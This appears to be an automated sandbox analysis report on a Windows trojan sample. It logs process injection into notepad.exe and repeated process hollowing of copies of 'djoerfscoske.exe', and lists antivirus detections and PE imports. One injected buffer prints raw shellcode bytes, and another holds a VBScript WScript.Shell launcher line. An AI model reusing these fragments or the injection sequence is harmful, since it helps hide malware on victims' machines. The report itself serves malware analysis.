Process injection Process 3084 resumed a thread in remote process 3236
Process injection Process 3440 resumed a thread in remote process 3520
Process injection Process 3736 resumed a thread in remote process 1664
Process injection Process 3780 resumed a thread in remote process 3320
Time & API Arguments Status Return Repeated
1619517162.217375
NtResumeThread
thread_handle: 0x0000011c
suspend_count: 1
process_identifier: 2404
success 0 0
1619517175.6395
NtResumeThread
thread_handle: 0x0000011c
suspend_count: 1
process_identifier: 3220
success 0 0
1619517182.764
NtResumeThread
thread_handle: 0x0000011c
suspend_count: 1
process_identifier: 3464
success 0 0
1619517188.889875
NtResumeThread
thread_handle: 0x0000011c
suspend_count: 1
process_identifier: 3716
success 0 0
1619517197.12325
NtResumeThread
thread_handle: 0x0000011c
suspend_count: 1
process_identifier: 1320
success 0 0
1619517205.982125
NtResumeThread
thread_handle: 0x0000011c
suspend_count: 1
process_identifier: 3236
success 0 0
1619517214.310625
NtResumeThread
thread_handle: 0x0000011c
suspend_count: 1
process_identifier: 3520
success 0 0
1619517219.48225
NtResumeThread
thread_handle: 0x0000011c
suspend_count: 1
process_identifier: 1664
success 0 0
1619517225.873875
NtResumeThread
thread_handle: 0x0000011c
suspend_count: 1
process_identifier: 3320
success 0 0
Executed a process and injected code into it, probably while unpacking (50 out of 77 events)
Time & API Arguments Status Return Repeated
1619513303.139681
CreateProcessInternalW
thread_identifier: 2772
thread_handle: 0x0000011c
process_identifier: 2760
current_directory:
filepath: C:\Windows\System32\notepad.exe
track: 1
command_line:
filepath_r: C:\Windows\system32\notepad.exe
stack_pivoted: 0
creation_flags: 32 (NORMAL_PRIORITY_CLASS)
process_handle: 0x00000114
inherit_handles: 0
success 1 0
1619513303.139681
NtAllocateVirtualMemory
process_identifier: 2760
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0x00000114
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x000b0000
success 0 0
1619513303.139681
NtAllocateVirtualMemory
process_identifier: 2760
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 4 (PAGE_READWRITE)
process_handle: 0x00000114
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x000c0000
success 0 0
1619513303.139681
WriteProcessMemory
process_identifier: 2760
buffer: Q¹0d‹‹@ ‹@ ‹‹‹@‰$‹$YÃVWR¾§ÆgNè„Yƒøv· ¿Zwf;Ït ¿Ntf;ÏuƒÂƒè…Àt‹ÎÁá‹þÁïϾ:Ï3ñBHué_‹Æ^ÃU‹ìQQ‹MSVW…Ét;¸MZf9u1‹A<Át*8PEu"‹@xƒeüÁ‹x‹X$‹p ‹@ùÙñ‰Eø…Àu 3À_^[ÉËM‹Eü‹†ÑèOÿÿÿ;E t ÿEü‹Eü;Eøràë׋Eü·C‹‡EëÊU‹ìQSW3ÿWWjWjh@ÿuÿV‹Øƒûÿu3Àë&WWWS‰}üÿV0W‹}EüPWÿu SÿV SÿV3À9}ü”À_[ÉÅÉtè•…Àt3Éf‰ÃU‹ììV‹ð…äüÿÿP3ÀPPjPÿVl…À…Žj\Xf‰Eü3Àj.f‰EþXjvf‰EðXf‰EòjbXf‰EôjsXf‰Eö3Àf‰EøUü…äüÿÿèÖ‹U è΍UðèÆÿu…ìþÿÿÿuPÿVxƒÄ …äüÿÿPÿV…ìþÿÿPèÂ@P…ìþÿÿP…äüÿÿPèîþÿÿƒÄ^ÉÃU‹ìì,j:XjZf‰EÜXjof‰EÞXjnf‰EàXjef‰EâXjIf‰EäXjdf‰EæXjef‰EèXjnf‰EêXjtf‰EìXjif‰EîXjff‰EðXjif‰EòXf‰EôjeXf‰EöjrXf‰Eø3Àf‰Eú…Ôýÿÿ謍UÜè÷EÿPÆEÿèPEÿP…ÔýÿÿPè?þÿÿƒÄÉÃU‹ìQƒeüV‹ðEüPÿuèþYY…Àtƒ}ütÿuüPÿu è þÿÿƒÄ …Àt3À@ë3À^ÉÃU‹ììSV‹ð‹Ï…øýÿÿè'‹Èè(þÿÿ3ÛS…øýÿÿPÿVWÿV8] uWÿu‹Æè~ÿÿÿYY‹Øë €} u5SWÿuÿWÿV(3ۃøÿ‹Ï•Ãèªþÿÿƒûu9]u WÿV(ƒÈPWÿV,3À@ë3À^[ÉÃU‹ìƒìSVWèsüÿÿ‹ø…ÿ„"h"¿ŠWèÌüÿÿ‹ØYY…Û„ jh0h„jÿӋð…ö„ñh¼Û«½W‰~`‰^@è•üÿÿhÒ¼‰W‰F$è‡üÿÿh|QgjW‰F(èyüÿÿhëI”W‰F,èküÿÿh•å©—W‰F0è]üÿÿh¥°(W‰F4èOüÿÿh)·W‰F8èAüÿÿh[uŠðW‰FDè3üÿÿƒÄ@‹Øhd†óuW‰^ è üÿÿh¢¦aëW‰F èüÿÿhÕOd"W‰Fèüÿÿhy.ÔW‰Fèöûÿÿh±÷W‰FèèûÿÿheóW÷W‰FèÚûÿÿh¯4P“W‰FèÌûÿÿh{=#W‰F<è¾ûÿÿƒÄ@hOû~ W‰Fè­ûÿÿhà=!6W‰FHèŸûÿÿhh‰#W‰è’ûÿÿ‰FLhÍeWè„ûÿÿhÓ1ÆVW‰FPèvûÿÿh7œ½W‰FTèhûÿÿh£-ãW‰FXèZûÿÿ‰F\ƒÄ8EðPÇEðshelÇEôl32ÿӋø…ÿt"hÀåz°W‰~dè,ûÿÿhêêºW‰FlèûÿÿƒÄ‰FpEøPÇEøuserfÇEü32ÆEþÿV ‹ø…ÿtAhqV°0W‰~hèìúÿÿhkV°0W‰FxèÞúÿÿh&cj—W‰FtèÐúÿÿh<cj—W‰F|èÂúÿÿƒÄ ‰†€‹Æë3À_^[ÉÃU‹ìƒì\V‹uW3ÿ;÷„îSè¤ýÿÿ‹Ø;ßu WÿDéՍ†‰EüPëj2ÿSPÿuüWWÿSL…ÀuïjdÿSPF‰Eø‰E9>tYÿ¶¶ŽQP¾ ‹Ãè¾üÿÿ‰}3ÿƒÄ 9>t1jDE¤WPèjEèWPèüƒÄEèPE¤PWWj WWWWÿuÿS$9¾(t†lP†,Pÿu‹Ãè½úÿÿƒÄ 9¾tëj2ÿSPÿuüWWÿSL…ÀuïjdÿSPÿuøÿSWÿSD[_3À^ÉÂU‹ìƒì SW3ÿWWjWjh€ÿu‰}øÿV‹Øƒûÿu3Àë>WSÿV‰Eô;Çt+jh0PWÿV@‰Eø;ÇtWMüQÿuô‰}üPSÿV‹Eü‹M ‰SÿV‹Eø_[É÷f‰f…ÒtV‹ð+ñƒÁ·f‰f…Òuñ^ÃU‹ìQQ‹E‰Eü‹EüE‰Eø‹Eü;Eøt‹EüŠM ˆ‹Eü@‰Eüëç‹EÉÃfƒ8V‹ðt ƒÆfƒ>u÷+ò· f‰ ƒÂf…Éuñ^ËD$Š@„Éuù+D$HÅÉu3ÀÃfƒ9‹Át ƒÀfƒ8u÷+ÁÑøÃ…Ét èÚÿÿÿ…ÀtDAþë fƒù\t ƒè·f…Éuï3ÀÃ
process_handle: 0x00000114
base_address: 0x000b0000
success 1 0
1619513303.139681
WriteProcessMemory
process_identifier: 2760
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\5adb65b33594aa52a676bf25702b4d8b.exeC:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\djoerfscoske.exe"C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\5adb65b33594aa52a676bf25702b4d8b.exe" webseT xbB = creatEoBJEcT("WsCript.ShEll") XBB.run """%ls""", 0, False
process_handle: 0x00000114
base_address: 0x000c0000
success 1 0
1619517160.498125
CreateProcessInternalW
thread_identifier: 2636
thread_handle: 0x000000d0
process_identifier: 2868
current_directory:
filepath: C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\djoerfscoske.exe
track: 1
command_line:
filepath_r: C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\djoerfscoske.exe
stack_pivoted: 0
creation_flags: 32 (NORMAL_PRIORITY_CLASS)
process_handle: 0x000000cc
inherit_handles: 0
success 1 0
1619517161.279375
CreateProcessInternalW
thread_identifier: 2544
thread_handle: 0x0000011c
process_identifier: 2404
current_directory:
filepath:
track: 1
command_line: "C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\djoerfscoske.exe"
filepath_r:
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
process_handle: 0x00000114
inherit_handles: 0
success 1 0
1619517161.279375
NtUnmapViewOfSection
process_identifier: 2404
region_size: 4096
process_handle: 0x00000114
base_address: 0x00400000
success 0 0
1619517161.295375
NtMapViewOfSection
section_handle: 0x00000124
process_identifier: 2404
commit_size: 1458176
win32_protect: 64 (PAGE_EXECUTE_READWRITE)
buffer:
process_handle: 0x00000114
allocation_type: 0 ()
section_offset: 0
view_size: 1458176
base_address: 0x00400000
success 0 0
1619517161.435375
NtGetContextThread
thread_handle: 0x0000011c
success 0 0
1619517161.451375
NtSetContextThread
thread_handle: 0x0000011c
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 5644368
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 2404
success 0 0
1619517162.217375
NtResumeThread
thread_handle: 0x0000011c
suspend_count: 1
process_identifier: 2404
success 0 0
1619517162.389375
CreateProcessInternalW
thread_identifier: 2616
thread_handle: 0x00000120
process_identifier: 2060
current_directory:
filepath:
track: 1
command_line: "C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\djoerfscoske.exe" 2 2404 20490703
filepath_r:
stack_pivoted: 0
creation_flags: 32 (NORMAL_PRIORITY_CLASS)
process_handle: 0x00000130
inherit_handles: 0
success 1 0
1619517173.82625
CreateProcessInternalW
thread_identifier: 3148
thread_handle: 0x00000214
process_identifier: 3144
current_directory:
filepath: C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\djoerfscoske.exe
track: 1
command_line:
filepath_r: C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\djoerfscoske.exe
stack_pivoted: 0
creation_flags: 32 (NORMAL_PRIORITY_CLASS)
process_handle: 0x00000218
inherit_handles: 0
success 1 0
1619517174.8425
CreateProcessInternalW
thread_identifier: 3224
thread_handle: 0x0000011c
process_identifier: 3220
current_directory:
filepath:
track: 1
command_line: "C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\djoerfscoske.exe"
filepath_r:
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
process_handle: 0x00000114
inherit_handles: 0
success 1 0
1619517174.8425
NtUnmapViewOfSection
process_identifier: 3220
region_size: 4096
process_handle: 0x00000114
base_address: 0x00400000
success 0 0
1619517174.8575
NtMapViewOfSection
section_handle: 0x00000124
process_identifier: 3220
commit_size: 1458176
win32_protect: 64 (PAGE_EXECUTE_READWRITE)
buffer:
process_handle: 0x00000114
allocation_type: 0 ()
section_offset: 0
view_size: 1458176
base_address: 0x00400000
success 0 0
1619517174.9985
NtGetContextThread
thread_handle: 0x0000011c
success 0 0
1619517175.0145
NtSetContextThread
thread_handle: 0x0000011c
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 5644368
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 3220
success 0 0
1619517175.6395
NtResumeThread
thread_handle: 0x0000011c
suspend_count: 1
process_identifier: 3220
success 0 0
1619517176.3575
CreateProcessInternalW
thread_identifier: 3284
thread_handle: 0x00000120
process_identifier: 3280
current_directory:
filepath:
track: 1
command_line: "C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\djoerfscoske.exe" 2 3220 20504140
filepath_r:
stack_pivoted: 0
creation_flags: 32 (NORMAL_PRIORITY_CLASS)
process_handle: 0x00000130
inherit_handles: 0
success 1 0
1619517179.826375
CreateProcessInternalW
thread_identifier: 3400
thread_handle: 0x00000148
process_identifier: 3396
current_directory:
filepath: C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\djoerfscoske.exe
track: 1
command_line:
filepath_r: C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\djoerfscoske.exe
stack_pivoted: 0
creation_flags: 32 (NORMAL_PRIORITY_CLASS)
process_handle: 0x0000014c
inherit_handles: 0
success 1 0
1619517181.639
CreateProcessInternalW
thread_identifier: 3468
thread_handle: 0x0000011c
process_identifier: 3464
current_directory:
filepath:
track: 1
command_line: "C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\djoerfscoske.exe"
filepath_r:
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
process_handle: 0x00000114
inherit_handles: 0
success 1 0
1619517181.654
NtUnmapViewOfSection
process_identifier: 3464
region_size: 4096
process_handle: 0x00000114
base_address: 0x00400000
success 0 0
1619517181.67
NtMapViewOfSection
section_handle: 0x00000124
process_identifier: 3464
commit_size: 1458176
win32_protect: 64 (PAGE_EXECUTE_READWRITE)
buffer:
process_handle: 0x00000114
allocation_type: 0 ()
section_offset: 0
view_size: 1458176
base_address: 0x00400000
success 0 0
1619517181.857
NtGetContextThread
thread_handle: 0x0000011c
success 0 0
1619517181.857
NtSetContextThread
thread_handle: 0x0000011c
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 5644368
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 3464
success 0 0
1619517182.764
NtResumeThread
thread_handle: 0x0000011c
suspend_count: 1
process_identifier: 3464
success 0 0
1619517183.404
CreateProcessInternalW
thread_identifier: 3528
thread_handle: 0x00000120
process_identifier: 3524
current_directory:
filepath:
track: 1
command_line: "C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\djoerfscoske.exe" 2 3464 20511250
filepath_r:
stack_pivoted: 0
creation_flags: 32 (NORMAL_PRIORITY_CLASS)
process_handle: 0x00000130
inherit_handles: 0
success 1 0
1619517186.420875
CreateProcessInternalW
thread_identifier: 3652
thread_handle: 0x00000134
process_identifier: 3648
current_directory:
filepath: C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\djoerfscoske.exe
track: 1
command_line:
filepath_r: C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\djoerfscoske.exe
stack_pivoted: 0
creation_flags: 32 (NORMAL_PRIORITY_CLASS)
process_handle: 0x00000138
inherit_handles: 0
success 1 0
1619517188.264875
CreateProcessInternalW
thread_identifier: 3720
thread_handle: 0x0000011c
process_identifier: 3716
current_directory:
filepath:
track: 1
command_line: "C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\djoerfscoske.exe"
filepath_r:
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
process_handle: 0x00000114
inherit_handles: 0
success 1 0
1619517188.264875
NtUnmapViewOfSection
process_identifier: 3716
region_size: 4096
process_handle: 0x00000114
base_address: 0x00400000
success 0 0
1619517188.279875
NtMapViewOfSection
section_handle: 0x00000124
process_identifier: 3716
commit_size: 1458176
win32_protect: 64 (PAGE_EXECUTE_READWRITE)
buffer:
process_handle: 0x00000114
allocation_type: 0 ()
section_offset: 0
view_size: 1458176
base_address: 0x00400000
success 0 0
1619517188.357875
NtGetContextThread
thread_handle: 0x0000011c
success 0 0
1619517188.357875
NtSetContextThread
thread_handle: 0x0000011c
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 5644368
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 3716
success 0 0
1619517188.889875
NtResumeThread
thread_handle: 0x0000011c
suspend_count: 1
process_identifier: 3716
success 0 0
1619517189.248875
CreateProcessInternalW
thread_identifier: 3780
thread_handle: 0x00000120
process_identifier: 3776
current_directory:
filepath:
track: 1
command_line: "C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\djoerfscoske.exe" 2 3716 20517375
filepath_r:
stack_pivoted: 0
creation_flags: 32 (NORMAL_PRIORITY_CLASS)
process_handle: 0x00000130
inherit_handles: 0
success 1 0
1619517195.420625
CreateProcessInternalW
thread_identifier: 4052
thread_handle: 0x00000190
process_identifier: 4048
current_directory:
filepath: C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\djoerfscoske.exe
track: 1
command_line:
filepath_r: C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\djoerfscoske.exe
stack_pivoted: 0
creation_flags: 32 (NORMAL_PRIORITY_CLASS)
process_handle: 0x00000194
inherit_handles: 0
success 1 0
1619517196.02925
CreateProcessInternalW
thread_identifier: 1880
thread_handle: 0x0000011c
process_identifier: 1320
current_directory:
filepath:
track: 1
command_line: "C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\djoerfscoske.exe"
filepath_r:
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
process_handle: 0x00000114
inherit_handles: 0
success 1 0
1619517196.02925
NtUnmapViewOfSection
process_identifier: 1320
region_size: 4096
process_handle: 0x00000114
base_address: 0x00400000
success 0 0
1619517196.04525
NtMapViewOfSection
section_handle: 0x00000124
process_identifier: 1320
commit_size: 1458176
win32_protect: 64 (PAGE_EXECUTE_READWRITE)
buffer:
process_handle: 0x00000114
allocation_type: 0 ()
section_offset: 0
view_size: 1458176
base_address: 0x00400000
success 0 0
1619517196.13925
NtGetContextThread
thread_handle: 0x0000011c
success 0 0
1619517196.13925
NtSetContextThread
thread_handle: 0x0000011c
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 5644368
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 1320
success 0 0
1619517197.12325
NtResumeThread
thread_handle: 0x0000011c
suspend_count: 1
process_identifier: 1320
success 0 0
1619517197.73225
CreateProcessInternalW
thread_identifier: 1300
thread_handle: 0x00000120
process_identifier: 1688
current_directory:
filepath:
track: 1
command_line: "C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\djoerfscoske.exe" 2 1320 20525609
filepath_r:
stack_pivoted: 0
creation_flags: 32 (NORMAL_PRIORITY_CLASS)
process_handle: 0x00000130
inherit_handles: 0
success 1 0
1619517202.26425
CreateProcessInternalW
thread_identifier: 2288
thread_handle: 0x0000014c
process_identifier: 3084
current_directory:
filepath: C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\djoerfscoske.exe
track: 1
command_line:
filepath_r: C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\djoerfscoske.exe
stack_pivoted: 0
creation_flags: 32 (NORMAL_PRIORITY_CLASS)
process_handle: 0x00000150
inherit_handles: 0
success 1 0
1619517204.592125
CreateProcessInternalW
thread_identifier: 3252
thread_handle: 0x0000011c
process_identifier: 3236
current_directory:
filepath:
track: 1
command_line: "C:\Users\Administrator.Oskar-PC\AppData\Roaming\appdata\djoerfscoske.exe"
filepath_r:
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
process_handle: 0x00000114
inherit_handles: 0
success 1 0
1619517204.592125
NtUnmapViewOfSection
process_identifier: 3236
region_size: 4096
process_handle: 0x00000114
base_address: 0x00400000
success 0 0
1619517204.701125
NtMapViewOfSection
section_handle: 0x00000124
process_identifier: 3236
commit_size: 1458176
win32_protect: 64 (PAGE_EXECUTE_READWRITE)
buffer:
process_handle: 0x00000114
allocation_type: 0 ()
section_offset: 0
view_size: 1458176
base_address: 0x00400000
success 0 0
1619517205.014125
NtGetContextThread
thread_handle: 0x0000011c
success 0 0
File has been identified by 60 AntiVirus engines on VirusTotal as malicious (50 out of 60 events)
Bkav W32.AIDetectVM.malware2
Elastic malicious (high confidence)
MicroWorld-eScan Trojan.GenericKD.34266717
FireEye Generic.mg.5adb65b33594aa52
McAfee Fareit-FPQ!5ADB65B33594
Cylance Unsafe
VIPRE Trojan.Win32.Generic!BT
Sangfor Malware
K7AntiVirus Riskware ( 0040eff71 )
Alibaba Trojan:Win32/DelfInject.ali2000015
K7GW Riskware ( 0040eff71 )
CrowdStrike win/malicious_confidence_90% (W)
Arcabit Trojan.Generic.D20ADE5D
Cyren W32/Trojan.JHFN-0050
Symantec ML.Attribute.HighConfidence
APEX Malicious
Avast Win32:Malware-gen
ClamAV Win.Dropper.Nanocore-9168858-0
Kaspersky HEUR:Trojan.Win32.Kryptik.gen
BitDefender Trojan.GenericKD.34266717
NANO-Antivirus Trojan.Win32.Kryptik.hprcdn
Paloalto generic.ml
AegisLab Trojan.Win32.Kryptik.4!c
Ad-Aware Trojan.GenericKD.34266717
Emsisoft Trojan.GenericKD.34266717 (B)
Comodo Malware@#funowvuby8c9
F-Secure Trojan.TR/Injector.jawnn
DrWeb Trojan.PWS.Stealer.28996
Zillya Trojan.Injector.Win32.755492
TrendMicro Trojan.Win32.MALREP.THKOABO
McAfee-GW-Edition BehavesLike.Win32.Fareit.tc
Sophos Mal/Generic-S
Jiangmin Trojan.Kryptik.bzn
eGambit Unsafe.AI_Score_86%
Avira TR/Injector.jawnn
Antiy-AVL Trojan/Win32.Kryptik
Kingsoft Win32.Troj.Undef.(kcloud)
Gridinsoft Trojan.Win32.FormBook.oa
Microsoft Trojan:Win32/DataStealer.VD!MTB
ZoneAlarm HEUR:Trojan.Win32.Kryptik.gen
GData Trojan.GenericKD.34266717
Cynet Malicious (score: 100)
AhnLab-V3 Suspicious/Win.Delphiless.X2094
Acronis suspicious
BitDefenderTheta Gen:NN.ZelphiF.34670.uHW@amp55Bci
ALYac Trojan.Agent.Masslogger
MAX malware (ai score=80)
VBA32 TScope.Trojan.Delf
Malwarebytes Trojan.MalPack.DLF
ESET-NOD32 a variant of Win32/Injector.EMVB
Visual analysis
Binary image
No binary image available: no binary visualization image was generated for this sample
Runtime screenshots
No runtime screenshots available: no screenshots were captured while this sample ran


PE Compile Time

1992-06-20 06:22:17

Imports

Library kernel32.dll:
0x493178 VirtualFree
0x49317c VirtualAlloc
0x493180 LocalFree
0x493184 LocalAlloc
0x493188 GetVersion
0x49318c GetCurrentThreadId
0x493198 VirtualQuery
0x49319c WideCharToMultiByte
0x4931a0 MultiByteToWideChar
0x4931a4 lstrlenA
0x4931a8 lstrcpynA
0x4931ac LoadLibraryExA
0x4931b0 GetThreadLocale
0x4931b4 GetStartupInfoA
0x4931b8 GetProcAddress
0x4931bc GetModuleHandleA
0x4931c0 GetModuleFileNameA
0x4931c4 GetLocaleInfoA
0x4931c8 GetCommandLineA
0x4931cc FreeLibrary
0x4931d0 FindFirstFileA
0x4931d4 FindClose
0x4931d8 ExitProcess
0x4931dc WriteFile
0x4931e4 RtlUnwind
0x4931e8 RaiseException
0x4931ec GetStdHandle
Library user32.dll:
0x4931f4 GetKeyboardType
0x4931f8 LoadStringA
0x4931fc MessageBoxA
0x493200 CharNextA
Library advapi32.dll:
0x493208 RegQueryValueExA
0x49320c RegOpenKeyExA
0x493210 RegCloseKey
Library oleaut32.dll:
0x493218 SysFreeString
0x49321c SysReAllocStringLen
0x493220 SysAllocStringLen
Library kernel32.dll:
0x493228 TlsSetValue
0x49322c TlsGetValue
0x493230 LocalAlloc
0x493234 GetModuleHandleA
Library advapi32.dll:
0x49323c RegQueryValueExA
0x493240 RegOpenKeyExA
0x493244 RegCloseKey
Library kernel32.dll:
0x49324c lstrcpyA
0x493250 WriteFile
0x493254 WaitForSingleObject
0x493258 VirtualQuery
0x49325c VirtualAlloc
0x493260 Sleep
0x493264 SizeofResource
0x493268 SetThreadLocale
0x49326c SetFilePointer
0x493270 SetEvent
0x493274 SetErrorMode
0x493278 SetEndOfFile
0x49327c ResetEvent
0x493280 ReadFile
0x493284 MultiByteToWideChar
0x493288 MulDiv
0x49328c LockResource
0x493290 LoadResource
0x493294 LoadLibraryA
0x4932a0 GlobalUnlock
0x4932a4 GlobalSize
0x4932a8 GlobalReAlloc
0x4932ac GlobalHandle
0x4932b0 GlobalLock
0x4932b4 GlobalFree
0x4932b8 GlobalFindAtomA
0x4932bc GlobalDeleteAtom
0x4932c0 GlobalAlloc
0x4932c4 GlobalAddAtomA
0x4932c8 GetVersionExA
0x4932cc GetVersion
0x4932d0 GetUserDefaultLCID
0x4932d4 GetTickCount
0x4932d8 GetThreadLocale
0x4932dc GetSystemInfo
0x4932e0 GetStringTypeExA
0x4932e4 GetStdHandle
0x4932e8 GetProcAddress
0x4932ec GetModuleHandleA
0x4932f0 GetModuleFileNameA
0x4932f4 GetLocaleInfoA
0x4932f8 GetLocalTime
0x4932fc GetLastError
0x493300 GetFullPathNameA
0x493304 GetDiskFreeSpaceA
0x493308 GetDateFormatA
0x49330c GetCurrentThreadId
0x493310 GetCurrentProcessId
0x493314 GetComputerNameA
0x493318 GetCPInfo
0x49331c GetACP
0x493320 FreeResource
0x493324 InterlockedExchange
0x493328 FreeLibrary
0x49332c FormatMessageA
0x493330 FindResourceA
0x493334 EnumCalendarInfoA
0x493340 CreateThread
0x493344 CreateFileA
0x493348 CreateEventA
0x49334c CompareStringA
0x493350 CloseHandle
Library version.dll:
0x493358 VerQueryValueA
0x493360 GetFileVersionInfoA
Library gdi32.dll:
0x493368 UnrealizeObject
0x49336c StretchBlt
0x493370 SetWindowOrgEx
0x493374 SetWinMetaFileBits
0x493378 SetViewportOrgEx
0x49337c SetTextColor
0x493380 SetStretchBltMode
0x493384 SetROP2
0x493388 SetPixel
0x49338c SetMapMode
0x493390 SetEnhMetaFileBits
0x493394 SetDIBColorTable
0x493398 SetBrushOrgEx
0x49339c SetBkMode
0x4933a0 SetBkColor
0x4933a4 SelectPalette
0x4933a8 SelectObject
0x4933ac SelectClipRgn
0x4933b0 SaveDC
0x4933b4 RestoreDC
0x4933b8 Rectangle
0x4933bc RectVisible
0x4933c0 RealizePalette
0x4933c4 Polyline
0x4933c8 PlayEnhMetaFile
0x4933cc PatBlt
0x4933d0 MoveToEx
0x4933d4 MaskBlt
0x4933d8 LineTo
0x4933dc LPtoDP
0x4933e0 IntersectClipRect
0x4933e4 GetWindowOrgEx
0x4933e8 GetWinMetaFileBits
0x4933ec GetTextMetricsA
0x4933f8 GetStockObject
0x4933fc GetPixel
0x493400 GetPaletteEntries
0x493404 GetObjectA
0x493414 GetEnhMetaFileBits
0x493418 GetDeviceCaps
0x49341c GetDIBits
0x493420 GetDIBColorTable
0x493424 GetDCOrgEx
0x49342c GetClipRgn
0x493430 GetClipBox
0x493434 GetBrushOrgEx
0x493438 GetBitmapBits
0x49343c ExtTextOutA
0x493440 ExcludeClipRect
0x493444 DeleteObject
0x493448 DeleteEnhMetaFile
0x49344c DeleteDC
0x493450 CreateSolidBrush
0x493454 CreateRectRgn
0x493458 CreatePenIndirect
0x49345c CreatePen
0x493460 CreatePalette
0x493468 CreateFontIndirectA
0x49346c CreateEnhMetaFileA
0x493470 CreateDIBitmap
0x493474 CreateDIBSection
0x493478 CreateCompatibleDC
0x493480 CreateBrushIndirect
0x493484 CreateBitmap
0x493488 CopyEnhMetaFileA
0x49348c CloseEnhMetaFile
0x493490 BitBlt
Library opengl32.dll:
0x493498 wglDeleteContext
Library user32.dll:
0x4934a0 CreateWindowExA
0x4934a4 WindowFromPoint
0x4934a8 WinHelpA
0x4934ac WaitMessage
0x4934b0 ValidateRect
0x4934b4 UpdateWindow
0x4934b8 UnregisterClassA
0x4934bc UnhookWindowsHookEx
0x4934c0 TranslateMessage
0x4934c8 TrackPopupMenu
0x4934d0 ShowWindow
0x4934d4 ShowScrollBar
0x4934d8 ShowOwnedPopups
0x4934dc ShowCursor
0x4934e0 SetWindowsHookExA
0x4934e4 SetWindowTextA
0x4934e8 SetWindowPos
0x4934ec SetWindowPlacement
0x4934f0 SetWindowLongA
0x4934f4 SetTimer
0x4934f8 SetScrollRange
0x4934fc SetScrollPos
0x493500 SetScrollInfo
0x493504 SetRect
0x493508 SetPropA
0x49350c SetParent
0x493510 SetMenuItemInfoA
0x493514 SetMenu
0x493518 SetForegroundWindow
0x49351c SetFocus
0x493520 SetCursor
0x493524 SetClassLongA
0x493528 SetCapture
0x49352c SetActiveWindow
0x493530 SendMessageA
0x493534 ScrollWindow
0x493538 ScreenToClient
0x49353c RemovePropA
0x493540 RemoveMenu
0x493544 ReleaseDC
0x493548 ReleaseCapture
0x493554 RegisterClassA
0x493558 RedrawWindow
0x49355c PtInRect
0x493560 PostQuitMessage
0x493564 PostMessageA
0x493568 PeekMessageA
0x49356c OffsetRect
0x493570 OemToCharA
0x493574 MessageBoxA
0x493578 MapWindowPoints
0x49357c MapVirtualKeyA
0x493580 LoadStringA
0x493584 LoadKeyboardLayoutA
0x493588 LoadIconA
0x49358c LoadCursorA
0x493590 LoadBitmapA
0x493594 KillTimer
0x493598 IsZoomed
0x49359c IsWindowVisible
0x4935a0 IsWindowEnabled
0x4935a4 IsWindow
0x4935a8 IsRectEmpty
0x4935ac IsIconic
0x4935b0 IsDialogMessageA
0x4935b4 IsChild
0x4935b8 InvalidateRect
0x4935bc IntersectRect
0x4935c0 InsertMenuItemA
0x4935c4 InsertMenuA
0x4935c8 InflateRect
0x4935d0 GetWindowTextA
0x4935d4 GetWindowRect
0x4935d8 GetWindowPlacement
0x4935dc GetWindowLongA
0x4935e0 GetWindowDC
0x4935e4 GetTopWindow
0x4935e8 GetSystemMetrics
0x4935ec GetSystemMenu
0x4935f0 GetSysColorBrush
0x4935f4 GetSysColor
0x4935f8 GetSubMenu
0x4935fc GetScrollRange
0x493600 GetScrollPos
0x493604 GetScrollInfo
0x493608 GetPropA
0x49360c GetParent
0x493610 GetWindow
0x493614 GetMessageTime
0x493618 GetMenuStringA
0x49361c GetMenuState
0x493620 GetMenuItemInfoA
0x493624 GetMenuItemID
0x493628 GetMenuItemCount
0x49362c GetMenu
0x493630 GetLastActivePopup
0x493634 GetKeyboardState
0x49363c GetKeyboardLayout
